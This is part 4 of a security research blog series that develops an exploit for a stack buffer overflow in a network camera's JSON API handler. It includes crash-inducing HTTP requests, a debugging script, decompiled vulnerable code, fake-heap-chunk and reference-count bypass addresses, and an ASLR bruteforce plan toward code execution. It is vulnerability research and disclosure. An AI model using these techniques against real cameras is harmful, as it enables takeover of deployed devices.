Welcome to the 4th part of this blog post series. If you have not read the previous blog posts I recommend you to have a look at part 1, where we discuss how to extract the firmware from the camera, part 2 where we enumerate the attack surface, and part 3 where we discuss how we discovered the vulnerability.
We ended the last part by discovering that sending the following request resulted in us receiving some strange data from the web server:
PUT /syno-api/activate HTTP/1.1
Host: 10.0.0.2
Content-Type: application/json
Content-Length: 58
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
The corresponding HTTP response shows some strange data in the output:
HTTP/1.1 400 Bad Request
Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0
Status: 400 Bad Request
Content-Type: text/plain
Content-Length: 99
Path [activate.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAè£JJð¢Jôe¤~Ôñv{] is not exist.
This is the hex encoding of the strange looking bytes. To us this immediately looked like memory addresses.
02 F0 A2 4A 02 F4 65 A4 7E D4 80 F1 76 7B
If we increase the length of the key in the JSON body:
PUT /syno-api/activate HTTP/1.1
Host: 10.0.0.2
Content-Type: application/json
Content-Length: 65
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
then we receive the following response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/plain
Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0
Content-Length: 109
Date: Fri, 09 Jan 1970 23:36:22 GMT
Connection: close
Error 500: Internal Server Error
Error: CGI program sent malformed or too big (>16384 bytes) HTTP headers: []
Additionally, if we look at the filesystem, a core_dump_log.txt
file was written in /tmp
.
root@BC500_AD:/tmp$ cat core_dump_log.txt
synocam_param.c core dumped at 1970-01-10 00:36:22
This confirms that synocam_param.cgi
program crashed due to our input!
At this point it was time to switch from Burp to GDB, to determine what exactly went wrong.
To debug the synocam_param.cgi
binary, we want to directly pass it the HTTP request information without sending it through webd
first. After some reversing, we discovered that the most information is passed as environment variables, and the body is sent via stdin
.
We extracted the necessary environment variables and created a bash script that will set them before starting the CGI binary. Most of the values can be static strings, only the CONTENT_LENGTH
and HTTP_CONTENT_LENGTH
have to be adjusted according to the payload.
This is the script we came up with:
root@BC500_AD:/mnt/SD0$ cat headers.sh
export SERVER_NAME=IPCam
export SERVER_ROOT=/www
export DOCUMENT_ROOT=/www
export SERVER_SOFTWARE=Civetweb/1.7
export GATEWAY_INTERFACE=CGI/1.1
export SERVER_PROTOCOL=HTTP/1.1
export REDIRECT_STATUS=200
export SERVER_PORT=443
export REQUEST_METHOD=PUT
export REMOTE_ADDR=192.168.88.107
export REMOTE_PORT=51696
export REQUEST_URI=/syno-api/security.info
export SCRIPT_NAME=/syno-api/security.info
export SCRIPT_FILENAME=/www/camera-cgi/synocam_param.cgi
export PATH_TRANSLATED=/www
export HTTPS=on
export CONTENT_TYPE=application/json
export CONTENT_LENGTH=`wc -c body-compass.txt | cut -d ' ' -f 1`
export PATH=/sbin:/usr/sbin:/bin:/usr/bin
export HTTP_HOST=192.168.88.111
export HTTP_CONTENT_LENGTH=`wc -c body-compass.txt | cut -d ' ' -f 1`
export HTTP_CONTENT_TYPE=application/json
export HTTP_X_REQUESTED_WITH=XMLHttpRequest
export HTTP_SEC_CH_UA_MOBILE=?0
export HTTP_USER_AGENT=UserAgent
export HTTP_SEC_CH_UA_PLATFORM=""
export HTTP_ORIGIN=https://192.168.88.111
export HTTP_SEC_FETCH_SITE=same-origin
export HTTP_SEC_FETCH_MODE=cors
export HTTP_SEC_FETCH_DEST=empty
export HTTP_X_FILE_NAME=Compass-name
export HTTP_REFERER=https://192.168.88.111/
export HTTP_ZZAUTHORIZATION=Digest username="compass",realm="IPCam",nonce="33415195",uri="/syno-api/login",qop=auth,nc=00000001,cnonce="afd8bd70",response="9df1db1c008ae0fa152aaaa2258c5a2e"
export HTTP_ACCEPT_ENCODING=gzip, deflate
export HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.9
export HTTP_COOKIE=sid=Mb9gJBsDhYxuu2lhgBmNinW67pv3H4lJpOVJOJEx1R6PI1OS24BQTeXoELGzeuKa
export HTTP_CONNECTION=close
export RESPONSE_TO=SOCKET
export ACTION_PREPARE=yes
export ACTION_QUERY=yes
/www/camera-cgi/synocam_param.cgi < body-compass.txt
The body-compass.txt
file simply contains the JSON payload we want to send to the CGI binary:
root@BC500_AD:/mnt/SD0$ cat body-compass.txt
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
If we now execute the script a segfault occurs. This looks promising!
root@BC500_AD:/mnt/SD0$ ./headers.sh
Segmentation fault (core dumped)
Now it’s time to start GDB to determine the exact cause of the crash. For this we modify the last line of our script to start the CGI binary using gdbserver
. The gdbserver
binary was not on the camera, so we cross-compiled it for arm 32-bit and then copied it to the camera.
After the modifications, the script looks as follows:
root@BC500_AD:/mnt/SD0$ cat gdb_cgi.sh
export SERVER_NAME=IPCam
[...CUT...]
export ACTION_QUERY=yes
/mnt/SD0/tools/gdbserver localhost:2000 /www/camera-cgi/synocam_param.cgi < body-compass.txt
Now we can connect to the gdbserver from our attacker machine to debug synocam_paragm.cgi
. For this we start gdb-multiarch. We will use the gdb-gef
and pwndbg
plugins to improve the debugging experience.
Initially, we just let the script run without any breakpoints to examine the state when it crashes:
This looks really promising. At the moment of the crash, the registers $r0
and $r3
are set to 0x41414141
. This is the hex representation of AAAA
, meaning our input. The program tries to dereference our data and crashes as 0x41414141
is no valid address. Thus, there is definitely a bug in the program, but is it also exploitable? For this, we wanted to determine the exact location of the crash and track down how our input propagates through the program.
The backtrace shows that the crash happened in libjansson, a JSON parsing library that is being used by synocam_param.cgi
.
Using GDB, the decompiled pseudo-code, and the source code of libjansson from Github we started to analyze what functions are called when our request is handled to determine where our input causes memory corruption.
In this blog we will show the pseudo-code from the decompiler. It is not exact C code, it should not be too hard to read.
We start where synocam_param.cgi
handles HTTP requests. If a PUT request is sent, the handle_put_req
[1] function will be called.
undefined4 req_method_handlers(undefined4 req_info,undefined4 param_2,undefined4 *buffer) { undefined4 uVar1; char *__s1; int iVar2; undefined4 uVar3; *buffer = req_info; buffer[1] = param_2; uVar1 = get_body(req_info,"format"); uVar1 = get_file_extension_json_xml(uVar1); buffer[2] = uVar1; if (buffer[2] == 3) { uVar3 = buffer[1]; uVar1 = get_body(req_info,"format"); FUN_0001dd28(uVar3,400,"Unknown output format[%s]!",uVar1); uVar1 = 0xffffffff; } else { __s1 = (char *)FUN_0001c28c(req_info); if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"GET"), iVar2 != 0)) { if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"PUT"), iVar2 != 0)) { if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"POST"), iVar2 != 0)) { if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"DELETE"), iVar2 != 0)) { FUN_0001dd28(buffer[1],400,"Wrong request method[%s]!",__s1); return 0xffffffff; } handle_delete_req(buffer); } else { handle_post_req(buffer); } } else { handle_put_req(buffer); // [1] handler for PUT request } [...CUT...] }
The PUT request handler of synocam_param.cgi
will first extract the body from the HTTP request and then call json_loads_wrapper
[2] with the HTTP body as argument.
void handle_put_req(undefined4 *arg_req_info) { int *piVar1; char cVar2; [...CUT...] int local_14; local_14 = __stack_chk_guard; req_body = get_body(*arg_req_info,"json"); local_bc = (int *)json_loads_wrapper(req_body); // [2] the HTTP body is passed to json_loads_wrapper local_ac = json_load_file("/www/camera-cgi/synocam_config.json",0,0); pcVar3 = getenv("SCRIPT_NAME"); [...CUT...] }
Afterwards, this method will call json_loads
[3], which is in the shared library libjansson. The HTTP body of our request is passed as the first argument.
int * json_loads_wrapper(char *req_body) { bool bVar1; int iVar2; char *pcVar3; int *local_30c; char str [256]; undefined s [512]; memset(s,0,0x200); memset(str,0,0x100); if (req_body == (char *)0x0) { local_30c = (int *)0x0; } else { local_30c = (int *)json_loads(req_body,4,0); // [3] json_loads from libjansson is called with the request body if (((local_30c == (int *)0x0) || ((local_30c != (int *)0x0 && (*local_30c == 7)))) && (iVar2 = FUN_0001eda4(req_body,s,0x200), iVar2 == 1)) { bVar1 = true; } [...CUT...] }
From now on we are looking at methods from libjannson
. We could theoretically use the source code from GitHub, but it was not trivial to determine what commit corresponds to libjansson.so.4.7.0
. Thus, we will stick to the decompiler output.
The json_loads
function will initialize a lex
structure using the JSON body of the request [4]. The lex
structure holds our input and information about how much of it has already been processed. Afterwards, the lex
is passed to parse_json
[5].
undefined4 json_loads(int req_body,undefined4 param_2,undefined4 param_3) { int iVar1; int req_body_str; undefined4 local_5c; undefined lex [76]; undefined4 return_val; FUN_00012f58(param_3,"<string>"); if (req_body == 0) { error_set(param_3,0,"wrong arguments"); return_val = 0; } else { local_5c = 0; req_body_str = req_body; iVar1 = init_buf(lex,&next_char,param_2,&req_body_str); // [4] create lex structure if (iVar1 == 0) { return_val = parse_json(lex,param_2,param_3); // [5] the lex structure is passed to parse_json lex_close(lex); } else { return_val = 0; } } return return_val; }
The parse_json
method performs some syntax checks and then passes the lex
to parse_value
[6].
int parse_json(int lex,uint param_2,int param_3) { int iVar1; *(undefined4 *)(lex + 0x38) = 0; lex_scan(lex,param_3); if ((((param_2 & 4) == 0) && (*(int *)(lex + 0x3c) != 0x5b)) && (*(int *)(lex + 0x3c) != 0x7b)) { error_set(param_3,lex,"\'[\' or \'{\' expected"); iVar1 = 0; } else { iVar1 = parse_value(lex,param_2,param_3); // [6] the lex is passed to parse_value if (iVar1 == 0) { iVar1 = 0; } [...CUT...] }
The parse_value
function decides what type of JSON object it has to process (e.g., integer, string, object). In our case and object is processed, thus parse_object
is called with the lex as argument [7].
int parse_value(astruct *lex,uint param_2,undefined4 param_3) { void *pvVar1; int iVar2; void *__s; size_t __n; undefined8 uVar3; int local_c; lex->field41_0x38 = lex->field41_0x38 + 1; if (0x800 < lex->field41_0x38) { error_set(param_3,lex,"maximum parsing depth reached"); return 0; } iVar2 = lex->string_val; if (iVar2 == 0x101) { local_c = json_integer(lex->field43_0x40,lex->field44_0x44); } else if (iVar2 < 0x102) { if (iVar2 == 0x5b) { local_c = parse_array(lex,param_2,param_3); } else { if (iVar2 < 0x5c) { if (iVar2 == -1) { error_set(param_3,lex,"invalid token"); return 0; } LAB_00017114: error_set(param_3,lex,"unexpected token"); return 0; } if (iVar2 == 0x7b) { local_c = parse_object(lex,param_2,param_3); // [7] our body is passed to the parse_object function } [...CUT...] }
Finally, our input reaches the parse_object
function. The __isoc99_sscanf
function will read data from key
, according to the format specifiers (%s
) into the buffers overflow1
and overflow2
[8]. Note that sscanf
does not perform any bound checks and the two buffers have a fixed size. This is where the memory corruption (stack based buffer overflow) occurs!
If the input data (key
) is longer than the allocated buffers overflow1 and overflow2, the scanf operation will first fill the buffers, and then overwrite the stack variables n
, local_14
, *key
, local_c
, and finally the return address that is stored on the stack.
int parse_object(struct *lex,uint flags,undefined4 error) { void *pvVar1; int iVar2; undefined4 uVar3; undefined overflow1 [32]; // fixed size buffer char overflow2 [12]; // second fixed size buffer size_t n; int local_14; void *key; int local_c; local_c = json_object(); if (local_c == 0) { local_c = 0; } else { lex_scan(lex,error); if (lex->string_val != L'}') { while (lex->string_val == 0x100) { key = (void *)lex_steal_string(lex,&n); if (key == (void *)0x0) { return 0; } pvVar1 = memchr(key,0,n); if (pvVar1 != (void *)0x0) { jsonp_free(key); error_set(error,lex,"NUL byte in object key not supported"); goto error_label; } overflow2[0] = '\0'; __isoc99_sscanf(key,"%s %s",overflow1,overflow2); // [8] user controlled key is read into the two stack buffers without bounds check if (((flags & 1) != 0) && (iVar2 = json_object_get(local_c,overflow1), iVar2 != 0)) { jsonp_free(key); error_set(error,lex,"duplicate object key"); goto error_label; } lex_scan(lex,error); if (lex->string_val != L':') { jsonp_free(key); error_set(error,lex,"\':\' expected"); goto error_label; } lex_scan(lex,error); local_14 = parse_value(lex,flags,error); if (local_14 == 0) { jsonp_free(key); goto error_label; } if (overflow2[0] == '\0') { *(undefined4 *)(local_14 + 8) = 0; } else { uVar3 = FUN_00016a04(overflow2); *(undefined4 *)(local_14 + 8) = uVar3; } iVar2 = json_object_set_nocheck(local_c,overflow1,local_14); if (iVar2 != 0) { jsonp_free(key); json_decref(local_14); goto error_label; } json_decref(local_14); jsonp_free(key); lex_scan(lex,error); if (lex->string_val != 0x2c) { if (lex->string_val == 0x7d) { return local_c; } error_set(error,lex,"\'}\' expected"); goto error_label; } lex_scan(lex,error); } error_set(error,lex,"string or \'}\' expected"); error_label: json_decref(local_c); local_c = 0; } } return local_c; }
It is worth emphasizing that the invocation of sscanf is not present in the library’s source code hosted on GitHub (see https://github.com/akheron/jansson/blob/master/src/load.c#L662). No sscanf
call is present in any of the commits:
$ git grep sscanf $(git rev-list --all)
$
Some further reverse engineering revealed that the developers modified libjansson to add further functionality to it. The sscanf
call is part of those modifications.
Before starting to exploit the program, we should check what mitigations are in place:
$ checksec libjansson.so
Arch: arm-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
The library has been compiled with randomization but without stack canaries. Stack buffer overflows are usually exploited by overwriting the return address with a ROP chain. A ROP chain uses small code snippets already present in the program to cause the program to do attacker defined behavior. If the return address is overwritten with a ROP chain, the program will execute the attackers code once the current function returns.
But between the sscanf
call and the function’s return there is a quite some code with many checks we have to successfully pass. Thus, the idea was to modify the JSON input so that it reaches a return statement as quickly as possible. One way to do this is by excluding the colon “:” from the JSON input. This way, the following code path is taken [10]:
if (lex->string_val != L':') { // [10] if no ":" in the string we go to error jsonp_free(key); // [11] key has to point to a chunk-link object to pass free error_set(error,lex,"\':\' expected"); goto error_label; } [...CUT...] error_label: json_decref(local_c); // [12] this call cannot fail local_c = 0; } } return local_c; //[13] return from function, overflow to control $pc }
If we overflow the buffer, we will overwrite the stack variable key
in the process. This variable is the argument to jsonp_free(key)
[11] ( a wrapper around glibc’s free). Thus, to not crash while taking this code path, key has to be a valid value for free. The screenshot below shows the memory state before the call to jsonp_free(key). The register $r0
holds the first argument to free, which is unsurprisingly 0x41414141
.
To not crash the program, we have to overwrite key with a value that is a valid heap chunk or looks like one.
We decided to look for a fake heap chunk in a library. Otherwise we’d have to not only bruteforce the library address for ROP gadgets, but also the heap base. The fake chunk needs to be in a writable memory region, as free will write pointers and information into the freed chunk. Additionally, the chunk header (4-bits before the chunk) should be valid. We also want that the previous chunk in use bit is set in our fake header, so that free
will not merge/coalesce the fake chunk.
If you’re not familiar with how the glibc heap works, I can highly recommend you to read the following article: https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/.
In GDB we discover that address 0x76fcd3a0
in libjansson’s ‘writable region fulfills this requirement. The address 0x76fcd39c
[15] looks like a heap header of size 0x40 with the previous in use bit (0x1) set.
gef> vmmap 0x76fae000 0x76fbd000 0x0000f000 0x00000000 r-x /lib/libjansson.so.4.7.0 <- $r2, $lr 0x76fbd000 0x76fcc000 0x0000f000 0x0000f000 --- /lib/libjansson.so.4.7.0 0x76fcc000 0x76fcd000 0x00001000 0x0000e000 r-- /lib/libjansson.so.4.7.0 0x76fcd000 0x76fce000 0x00001000 0x0000f000 rw- /lib/libjansson.so.4.7.0 gef> x/16wx 0x76fcd3a0-16 0x76fcd390: 0x00000001 0x00000004 0x00000000 0x00000041 // [15] fake chunk header 0x76fcd3a0: 0x00000009 0x00468008 0x00001484 0x00001484 // fake chunk 0x76fcd3b0: 0x000000a0 0x00000003 0x00000000 0x00000004 0x76fcd3c0: 0x00000008 0x0000004a 0x00000009 0x00000042
While debugging, we will set the key
to 0x76fac530-4
before the call to jsonp_free
to continue creating our proof of concept.
By omitting a colon in the JSON payload and with the correct fake chunk we can make the program skip most of the code and directly go to the error_label
[12]. There, local_c
, a stack variable that was also overwritten will be passed to json_decref
. The function will try to decrease the reference count to the JSON object. But if a_local_c + 4
points to a value that is -1 [16], we will skip all the checks and immediately return.
void json_decref(int a_local_c) { if ((a_local_c != 0) && (*(int *)(a_local_c + 4) != -1)) { // [16] if a_local_c + 4 is -1, we directly return *(int *)(a_local_c + 4) = *(int *)(a_local_c + 4) + -1; if (*(int *)(a_local_c + 4) == 0) { json_delete(a_local_c); } } return; }
It is not hard to find an address that has value 0xffffffff
(-1). We decided to use 0x76fac530
.
gef> x/16wx 0x76fac520 0x76fac520: 0x00002800 0xffffffff 0xffffffff 0xffffffff 0x76fac530: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0x76fac540: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0x76fac550: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
Again, for our proof of concept register $r3
is set to 0x76fac530-4
in json_decref
to bypass this check.
Afterwards, execution is continued until the program crashes. We can see that the program counter $pc
was successfully overwritten!
We now modify the payload to contain the two addresses to correctly overwrite key
and local_c
and then just overwrite the return address with a ROP chain. Thus, exploitation should be trivial, right? Wrong!
Unfortunately, there are a few more problems that have to be tackled. Recall that the payload is sent as a JSON key. In libjansson the JSON key is of type TOKEN_STRING
. If we look at the documentation (https://jansson.readthedocs.io/en/2.7/apiref.html#string) we read the following:
Jansson uses UTF-8 as the character encoding. All JSON strings must be valid UTF-8 (or ASCII, as it’s a subset of UTF-8). All Unicode codepoints U+0000 through U+10FFFF are allowed, but you must use length-aware functions if you wish to embed NUL bytes in strings.
This means, we can only use UTF-8 characters in our payload. This will severely limit the available gadgets. Additionally, JSON_ALLOW_NUL
is not set, thus the payload cannot contain null bytes. This means, only bytes in the range 0x1-0x7F (minus 0x20 / space, which is consumed by sscanf
) can be used.
Luckily, there also exist some surrogate pairs in UTF-8. Meaning, one Unicode encoded character decodes to two or more hex bytes. For example \u0080
is the €
sign, which will be decoded as the two hex bytes C2 80
.
The following image shows what UTF-8 code points can be encoded in 1-4 bytes:
You can read more about UTF-8 here: https://en.wikipedia.org/wiki/UTF-8.
This is actually very useful. By using surrogate pairs, we can encode one arbitrary byte (e.g., 0x80), as long as we clobber the next byte with a predefined value (e.g., 0xC2) in the example above. Let’s take a quick detour before we come back how this helps us write an exploit.
The system is configured with 8-bit ASLR. This means that 8 bits of every address will be random. This was determined empirically by invoking the synocam_param.cgi
binary multiple times, as well as with the following command:
root@BC500_AD:/proc/sys/vm$ cat /proc/sys/vm/mmap_rnd_bits
8
For instance, in the address 0xABCDEFGH
, the two hex digits D and E are chosen at random for each invocation of synocam_param.cgi
. Luckily 8-bits is only 256 possibilities, so a bruteforce approach is possible.
For the attack, we might want to encode a function at 0x76838b34
. Recall, that we cannot do this using UTF-8 directly, as 0x83
and 0x8b
are larger than 0x7f
. We mentioned that Unicode surrogate pairs can be used to encode two bytes together. Using this is it possible to encode 0x838b
? Unfortunately, this is not possible.
This is where ASLR comes to our help. In 0x76838b34
, the 8 bits 0x38
will be randomized. Thus, we can choose them to be anything and just re-run the exploit until ASLR aligns with our guess/choice. If we set the ASLR bits to be 0x3d
, the final address becomes 0x76838b34
. This can then be encoded as \u0034\u06c3v
(little-endian byte order). v
represents 0x76, \u06c3
is a surrogate pair that decodes to 0x83DB and \u0034
is 0x34.
Please note that once we have chosen the ASLR bits, all our gadgets have to be encodable using those values.
The plan now is to call the system
function with an attacker-controlled argument. For this, we have to find gadgets that can be encoded as UTF-8 or UTF-8 surrogate pairs to create the ROP chain to execute arbitrary commands on the camera. While creating a ROP chain like this is possible, there is an easier way to achieve command execution.
Stay tuned for part 5 of this series where we will explain how we exploited the vulnerability in the end: